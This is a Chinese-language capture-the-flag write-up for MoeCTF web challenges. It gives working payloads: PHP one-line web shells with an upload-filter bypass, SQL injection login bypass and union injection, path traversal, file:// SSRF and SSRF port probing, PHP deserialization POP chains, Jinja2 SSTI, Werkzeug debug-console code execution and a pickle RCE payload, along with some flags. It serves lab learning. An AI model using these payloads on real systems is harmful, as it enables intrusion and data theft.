ProveYourLove

前端页面限制了重复提交, 需要绕过, 可以通过BurpSuite抓包爆破, 或者代码直接发包

import requestsurl='http://127.0.0.1:44395/questionnaire'data = {'nickname': '1','target': '1','message': '1','user_gender': 'male','target_gender': 'male','anonymous': 'false'
}for i in range(300):res = requests.post(url=url, json=data)print(res.json())

垫刀之路01: MoeCTF？启动！

可以直接执行命令, 题目提示了在环境中, 
env --> 直接得到flag

ImageCloud前置

payload:
?url=file:///etc/passwd题目提示了flag在 /etc/passwd里面, 直接使用file伪协议读取文件

垫刀之路02: 普通的文件上传

直接上传一句话木马, 命令执行<?=eval($_POST[1]);?>访问 /uploads/1.php
POST : 1=system("env");

垫刀之路03: 这是一个图床

上传1.php文件: <?php eval($_POST[1]);?>
抓包, 修改一下
Content-Type: image/pngPOST: 1=system("env");

垫刀之路04: 一个文件浏览器

点一些文件, 看到url的变化, 可以尝试目录穿越 --> ../
然后找flag
?path=../../../../tmp/flag哭死,找半天都没找到/tmp目录下去, 总是插肩而过

垫刀之路05: 登陆网站

用户名: admin123
密码: admin' or '1'='1

垫刀之路06: pop base mini moe

poc

<?php
class A{public $evil;public $a;
}class B{public $b;
}$c=new A();
$c->a=new B();
$c->evil='cat /flag';
$c->a->b='system';echo urlencode(serialize($c));

垫刀之路07: 泄漏的密码

给了pin码, 访问 /console 路由, 输入pin码, 进入, 执行代码

>>>import os;os.popen("ls").read()
'__pycache__\napp.py\nflag\ngetPIN.py\nstatic\ntemplates\n'
>>> os.popen("cat flag").read()
'moectf{DoNT_usINg-Flask_by_de6UG-m0D_aNd-IeAk_youR_Pin18}'

pop moe

<?phpclass class000 {private $payl0ad = 0;protected $what;public function __destruct(){$this->check();}public function check(){if($this->payl0ad === 0){die('FAILED TO ATTACK');}$a = $this->what;$a();}
}class class001 {public $payl0ad;public $a;public function __invoke(){$this->a->payload = $this->payl0ad;}
}class class002 {private $sec;public function __set($a, $b){$this->$b($this->sec);}public function dangerous($whaattt){$whaattt->evvval($this->sec);}}class class003 {public $mystr;public function evvval($str){eval($str);}public function __tostring(){return $this->mystr;}
}if(isset($_GET['data']))
{$a = unserialize($_GET['data']);
}
else {highlight_file(__FILE__);
}

poc

<?phpclass class000 {private $payl0ad = 1;public $what;   //new class001()
}
class class001{public $payl0ad;  //dangerouspublic $a; //new class002()}class class002{public $sec; //new class003()}
class class003{public $mystr;//phpinfo()}$a= new class000();
$a->what = new class001();
$a->what->a = new class002();
$a->what->payl0ad='dangerous';
$a->what->a->sec=new class003();
$a->what->a->sec->mystr='phpinfo();';echo urlencode(serialize($a));

静态网页

找一找, 点击换衣服,网络里面会多出几个get请求, 可以找到flag的一个路径

final1l1l_challenge.php

<?php
highlight_file('final1l1l_challenge.php');
error_reporting(0);
include 'flag.php';$a = $_GET['a'];
$b = $_POST['b'];
if (isset($a) && isset($b)) {if (!is_numeric($a) && !is_numeric($b)) {if ($a == 0 && md5($a) == $b[$a]) {echo $flag;} else {die('noooooooooooo');}} else {die( 'Notice the param type!');}
} else {die( 'Where is your param?');
}

数字加上字母绕过, 然后b数组传参a的md5值

?a=0q
b[0q]=189d32c1d8b08649849682bf9711b2be

电院_Backend

sql注入, or被过滤了, 用union select 绕过

123@qq.com' union select 1,2,3 # 

勇闯铜人阵

import re
from pydash import trim
import requests
from bs4 import BeautifulSoupurl1 = "http://127.0.0.1:47913/restart"
url2 = "http://127.0.0.1:47913/"sess = requests.session()
direct_list = ["北方", "东北方", "东方", "东南方", "南方", "西南方", "西方", "西北方"]def parse_status(html):bs = BeautifulSoup(html, "html.parser")coin = trim(bs.find('h1', id='status').text)# 一枚硬币if len(coin) == 1:return direct_list[int(coin) - 1]# 两枚硬币else:nums = re.findall(r'\d', coin)return direct_list[int(nums[0]) - 1] + '一个，' + direct_list[int(nums[1]) - 1] + '一个'if __name__ == "__main__":# restartsess.get(url=url1)# startbody = {"player": "sxrhhh","direct": "弟子明白",}r = sess.post(url=url2, data=body)# 循环for i in range(0, 5):payload = parse_status(r.text)body = {"player": "sxrhhh","direct": payload,}r = sess.post(url=url2, data=body)# 打印结果bs = BeautifulSoup(r.text, "html.parser")status = trim(bs.find('h1', id='status').text)print(status)

ImageCloud

app.py

from flask import Flask, request, send_file, abort, redirect, url_for
import os
import requests
from io import BytesIO
from PIL import Image
import mimetypes
from werkzeug.utils import secure_filenameapp = Flask(__name__)UPLOAD_FOLDER = 'static/'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDERALLOWED_EXTENSIONS = {'jpg', 'jpeg', 'png', 'gif'}uploaded_files = []def allowed_file(filename):return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS@app.route('/')
def index():return '''<h1>图片上传</h1><form method="post" enctype="multipart/form-data" action="/upload"><input type="file" name="file"><input type="submit" value="上传"></form><h2>已上传的图片</h2><ul>''' + ''.join(f'<li><a href="/image?url=http://localhost:5000/static/{filename}">{filename}</a></li>'for filename in uploaded_files) + '''</ul>'''@app.route('/upload', methods=['POST'])
def upload():if 'file' not in request.files:return '未找到文件部分', 400file = request.files['file']if file.filename == '':return '未选择文件', 400if file and allowed_file(file.filename):filename = secure_filename(file.filename)ext = filename.rsplit('.', 1)[1].lower()unique_filename = f"{len(uploaded_files)}_{filename}"filepath = os.path.join(app.config['UPLOAD_FOLDER'], unique_filename)file.save(filepath)uploaded_files.append(unique_filename)return redirect(url_for('index'))else:return '文件类型不支持', 400@app.route('/image', methods=['GET'])
def load_image():url = request.args.get('url')if not url:return 'URL 参数缺失', 400try:response = requests.get(url)response.raise_for_status()img = Image.open(BytesIO(response.content))img_io = BytesIO()img.save(img_io, img.format)img_io.seek(0)return send_file(img_io, mimetype=img.get_format_mimetype())except Exception as e:return f"无法加载图片: {str(e)}", 400if __name__ == '__main__':if not os.path.exists(UPLOAD_FOLDER):os.makedirs(UPLOAD_FOLDER)app.run(host='0.0.0.0', port=5000)

app2.py

from flask import Flask, request, send_file, abort, redirect, url_for
import os
import requests
from io import BytesIO
from PIL import Image
import mimetypes
from werkzeug.utils import secure_filename
import socket
import randomapp = Flask(__name__)UPLOAD_FOLDER = 'uploads/'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDERALLOWED_EXTENSIONS = {'jpg', 'jpeg', 'png', 'gif'}uploaded_files = []def allowed_file(filename):return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONSdef get_mimetype(file_path):mime = mimetypes.guess_type(file_path)[0]if mime is None:try:with Image.open(file_path) as img:mime = img.get_format_mimetype()except Exception:mime = 'application/octet-stream'return mimedef find_free_port_in_range(start_port, end_port):while True:port = random.randint(start_port, end_port)s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.bind(('0.0.0.0', port))s.close()return port @app.route('/')
def index():return '''<h1>图片上传</h1><form method="post" enctype="multipart/form-data" action="/upload"><input type="file" name="file"><input type="submit" value="上传"></form><h2>已上传的图片</h2><ul>''' + ''.join(f'<li><a href="/image/{filename}">{filename}</a></li>' for filename in uploaded_files) + '''</ul>'''@app.route('/upload', methods=['POST'])
def upload():if 'file' not in request.files:return '未找到文件部分', 400file = request.files['file']if file.filename == '':return '未选择文件', 400if file and allowed_file(file.filename):filename = secure_filename(file.filename)ext = filename.rsplit('.', 1)[1].lower()unique_filename = f"{len(uploaded_files)}_{filename}"filepath = os.path.join(app.config['UPLOAD_FOLDER'], unique_filename)file.save(filepath)uploaded_files.append(unique_filename)return redirect(url_for('index'))else:return '文件类型不支持', 400@app.route('/image/<filename>', methods=['GET'])
def load_image(filename):filepath = os.path.join(app.config['UPLOAD_FOLDER'], filename)if os.path.exists(filepath):mime = get_mimetype(filepath)return send_file(filepath, mimetype=mime)else:return '文件未找到', 404if __name__ == '__main__':if not os.path.exists(UPLOAD_FOLDER):os.makedirs(UPLOAD_FOLDER)port = find_free_port_in_range(5001, 6000)app.run(host='0.0.0.0', port=port)

app.py的端口是5000, app2.py的端口是5001-6000的随机一个
通过附件得知在 /uploads/目录下有一个 flag.jpg图片 应该就是flag所在

但是app.py只能访问到 /static/ 目录下的图片, 无法访问到 /uploads下的flag图片,
但是app2.py 里面 可以通过/image/<filename> 访问 /uploads 目录下的图片
但是app2.py运行的端口是不出网的, 无法直接访问
然后app.py里面的image路由下存在 url参数,随便上传一张图片, 可以发现它是这样去访问到图片的
?url=http://localhost:5000/static/0_huahua.png

所以就可以通过爆破出 app2.py运行的端口, 通过这个url参数去访问app2.py运行的服务

moectf{cetTebR@Te_YOU-aTtAck_To-mY_tMag3_CT0UdhHHHhH200}

who’s blog?

题目要去给一个id, 然后有回显 , 很容易想到 ssti, 直接用现成的一个payload就行
?id={{lipsum.__globals__['os'].popen('env').read()}}

PetStore

给了源码, 可以发现里面存在一个 pickle的反序列化, 可以进行利用执行命令

from flask import Flask, request, jsonify, render_template, redirect
import pickle
import base64
import uuidapp = Flask(__name__)class Pet:def __init__(self, name, species) -> None:self.name = nameself.species = speciesself.uuid = uuid.uuid4()def __repr__(self) -> str:return f"Pet(name={self.name}, species={self.species}, uuid={self.uuid})"class PetStore:def __init__(self) -> None:self.pets = []def create_pet(self, name, species) -> None:pet = Pet(name, species)self.pets.append(pet)def get_pet(self, pet_uuid) -> Pet | None:for pet in self.pets:if str(pet.uuid) == pet_uuid:return petreturn Nonedef export_pet(self, pet_uuid) -> str | None:pet = self.get_pet(pet_uuid)if pet is not None:self.pets.remove(pet)serialized_pet = base64.b64encode(pickle.dumps(pet)).decode("utf-8")return serialized_petreturn Nonedef import_pet(self, serialized_pet) -> bool:try:pet_data = base64.b64decode(serialized_pet)pet = pickle.loads(pet_data)if isinstance(pet, Pet):for i in self.pets:if i.uuid == pet.uuid:return Falseself.pets.append(pet)return Truereturn Falseexcept Exception:return Falsestore = PetStore()@app.route("/", methods=["GET"])
def index():pets = store.petsreturn render_template("index.html", pets=pets)@app.route("/create", methods=["POST"])
def create_pet():name = request.form["name"]species = request.form["species"]store.create_pet(name, species)return redirect("/")@app.route("/get", methods=["POST"])
def get_pet():pet_uuid = request.form["uuid"]pet = store.get_pet(pet_uuid)if pet is not None:return jsonify({"name": pet.name, "species": pet.species, "uuid": pet.uuid})else:return jsonify({"error": "Pet not found"})@app.route("/export", methods=["POST"])
def export_pet():pet_uuid = request.form["uuid"]serialized_pet = store.export_pet(pet_uuid)if serialized_pet is not None:return jsonify({"serialized_pet": serialized_pet})else:return jsonify({"error": "Pet not found"})@app.route("/import", methods=["POST"])
def import_pet():serialized_pet = request.form["serialized_pet"]if store.import_pet(serialized_pet):return redirect("/")else:return jsonify({"error": "Failed to import pet"})if __name__ == "__main__":app.run(host="0.0.0.0", port=8888, debug=False, threaded=True)

payload

import pickle
import base64
import os
class A:def __reduce__(self):return (exec, ("store.create_pet(__import__('os').popen('env').read(),1)",))store = A()
payload = pickle.dumps(store)
print(base64.b64encode(payload).decode())

传入payload, 刷新一下页面就行

参考文章

https://blog.csdn.net/qq_55038440/article/details/142826977